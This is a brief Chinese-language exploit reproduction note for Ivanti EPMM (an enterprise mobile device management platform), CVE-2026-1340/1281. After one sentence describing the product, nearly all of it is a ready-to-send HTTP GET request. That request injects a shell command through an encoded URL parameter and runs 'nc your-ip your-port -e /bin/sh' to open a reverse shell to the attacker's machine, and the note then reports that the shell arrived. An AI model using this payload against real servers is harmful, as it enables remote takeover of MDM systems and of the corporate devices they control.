Ivanti EPMM CVE-2026-1340/1281复现
Ivanti EPMM(Endpoint Manager Mobile) 是一款企业级 移动设备管理(MDM / UEM)平台,用于集中管理员工的 Android / iOS 设备,核心功能包括设备策略下发、应用分发、合规控制等。
提示:慎用curl命令
GET /mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60nc%201your-ip%20your-port%20-e%20/bin/sh%60%5D/e2327851-1e09-4463-9b5a-b524bc11fc17.ipa HTTP/1.1
Host: Host
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
sec-ch-ua: "Not(A:Brand";v="8", "Chromium";v="144", "Google Chrome";v="144"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9

nc接受到反弹

参考: